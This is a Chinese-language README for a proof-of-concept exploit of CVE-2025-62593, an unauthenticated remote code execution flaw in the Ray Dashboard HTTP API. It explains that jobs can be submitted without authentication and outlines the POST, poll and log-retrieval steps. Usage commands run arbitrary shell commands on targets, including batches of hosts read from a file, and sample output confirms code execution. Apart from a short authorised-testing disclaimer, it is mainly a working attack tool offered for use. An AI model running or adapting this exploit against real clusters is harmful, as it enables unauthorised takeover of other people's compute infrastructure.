CVE-2025-62593 的概念验证(PoC),该漏洞是 Ray 分布式 AI 计算引擎中的一个未认证远程代码执行漏洞,可通过基于浏览器的 DNS 重绑定攻击加以利用。该漏洞已被列入 CISA 已知被利用漏洞(KEV)目录,并且正在被积极利用。
根本原因是 Ray 团队长期以来的设计决策:在 /api/jobs 和 /api/job_agent/jobs 等关键 HTTP 端点上不启用任何认证。因此,未认证的远程攻击者可以提交一个 Ray 任务(Ray Job),其入口点(entrypoint)为任意命令,该命令随后会在集群头节点上执行——实现完全的远程代码执行。
此 PoC 直接与 Ray Dashboard HTTP API 通信(无需浏览器/DNS 重绑定即可演示底层漏洞),并从任务日志中恢复命令输出。
POST /api/jobs/,使用一个 entrypoint 运行你的命令并将其 stdout/stderr 捕获到临时文件中,然后打印该文件内容。GET /api/jobs/,直到任务达到终止状态。GET /api/jobs/<submission_id>/logs 并打印命令输出。# 单个目标
python3 ray_rce_poc.py --target http://HOST:8265
# 自定义命令
python3 ray_rce_poc.py --target http://HOST:8265 --command "id; uname -a"
# 从文件读取多个目标(每行一个,'#' 为注释)
python3 ray_rce_poc.py --targets targets.txt --command id
# 写入 JSON 摘要
python3 ray_rce_poc.py --target http://HOST:8265 --output out.json
# 帮助
python3 ray_rce_poc.py --help
仅需 Python 3 标准库——无第三方依赖。
$ python3 ray_rce_poc.py --target http://localhost:8265 --command "id; hostname"
== http://localhost:8265
Running entrypoint for job raysubmit_XXX: python -c "import os,os.path; ..."
uid=1000(ray) gid=100(users) groups=100(users),27(sudo)
05cdb1bea437
=> PASS (RCE confirmed, status: SUCCEEDED, exit code: 0)
仅用于安全研究和授权测试。请仅对您拥有或已获得明确测试许可的系统使用。作者不对滥用行为负责。